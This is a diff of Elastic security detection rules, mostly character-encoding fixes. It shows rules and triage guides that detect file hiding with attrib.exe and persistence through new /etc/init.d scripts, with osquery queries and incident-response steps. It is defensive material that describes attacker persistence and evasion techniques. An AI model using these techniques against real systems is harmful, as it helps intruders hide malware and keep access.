!{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not\n (process.parent.name: \"cmd.exe\" and\n process.command_line: \"attrib +R +H +S +A *.cui\" and\n process.parent.command_line: \"?:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \\\"?:\\\\WINDOWS\\\\system32\\\\*.bat\\\"\")\n", "related_integrations": [ { @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_109.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_109.json index 3a4028a27d1..c3ee02c21a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_109.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adding Hidden File Attribute via Attrib", - "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not\n (process.parent.name: \"cmd.exe\" and\n process.command_line: \"attrib +R +H +S +A *.cui\" and\n process.parent.command_line: \"?:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \\\"?:\\\\WINDOWS\\\\system32\\\\*.bat\\\"\")\n", "related_integrations": [ { @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_104.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_104.json index 87dc1e16ea5..835902e4338 100644 --- a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_104.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_105.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_105.json index 24f7ae7a5a6..416c119ac3f 100644 --- a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_106.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_106.json index ffb0e954ed3..61d1b4a6564 100644 --- a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_107.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_107.json index 125f7314825..2060cec2185 100644 --- a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_107.json +++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_107.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_102.json b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_102.json index f0c170aa394..21ec14e9253 100644 --- a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_102.json +++ b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_102.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_103.json b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_103.json index ae9a210db60..9e487f483ce 100644 --- a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_103.json +++ b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_103.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_104.json b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_104.json index 2c811c9c172..1b45c7a05d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_104.json +++ b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_104.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_1.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_1.json index eae437474fe..f9de8bf9ff0 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_1.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_2.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_2.json index 31d658cfdce..2e7a9e03dd1 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_3.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_3.json index a2390d43227..8d5572f08d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_3.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\") and not \nfile.extension : \"swp\"\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_4.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_4.json index 8298a525e1e..b35af4e7f5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_4.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT 